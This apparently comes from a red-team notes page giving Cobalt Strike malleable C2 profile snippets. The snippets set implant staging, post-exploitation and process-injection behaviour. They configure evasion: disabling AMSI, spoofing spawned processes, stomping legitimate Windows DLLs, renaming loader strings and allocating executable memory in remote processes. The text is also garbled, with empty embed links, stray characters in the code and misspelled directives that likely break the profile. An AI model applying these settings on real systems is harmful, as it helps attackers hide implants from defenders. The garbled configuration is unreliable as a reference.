# Malleable Profiles {% embed url="" %} {% embed url="" %} ### Options: ```bash #size of the assembly/powershell scripts set tasks_max_size ""; ``` ### Beacons:

stage {
	set compile_time "DATE OF COMPILATION";
	set image_size_x64 "522090";
	set image_size_x86 "522090";
	set clearnup "true";
	set obfucate "true";
	set name "dataparse.dll";
	set module_x86 "wuaueng.dll";
	set module_x64 "mssrch.dll";
	set stomppe "true";
	transform-x86 {
		strrep "ReflectiveLoader" "RunHelloWorld";
		}
	transform-x64 {
		strrep "ReflectiveLoader" "PrintMenu";
		}
}

### Post-Ex: ``` ## = random numbers msagent_## = standard communications status_## = staging over SMB ``` ```svg post-ex { # control the temporary process we spawn to set spawnto_x86 "`%windir%\syswow64\dllhost.exe` -k netsvcs";. set spawnto_x64 "%windir%\\sysnative\\mstsc.exe"; # change the permissions and content of our post-ex DLLs set obfuscate "true"; # change our post-ex output named pipe names... _ set pipename "evil_####, stuff\\not_##_ev#l"; set pipename_stager "update_##"; # pass key function pointers from Beacon to its child jobs set smartinject "true"; # disable AMSI in powerpick, execute-assembly, and psinject set amsi_disable "true"; } ``` ### Process-Inject: ``` process-inject { # set how memory is allocated in a remove process: set allocator "VirtualAllocEx"; # shape memory characteristics and content: set min_alloc "16384"; set startrwx "true"; set userwx "false"; transform-x86 { prepend "\x90\x90"; } transform-x64 { prepend "\x90\x90"; } # determine how to execute the injected code execute { CreateThread "ntdll.dll!RtlUserThreadStart"; SetThreadContext; RtlCreateUserThread; } } ```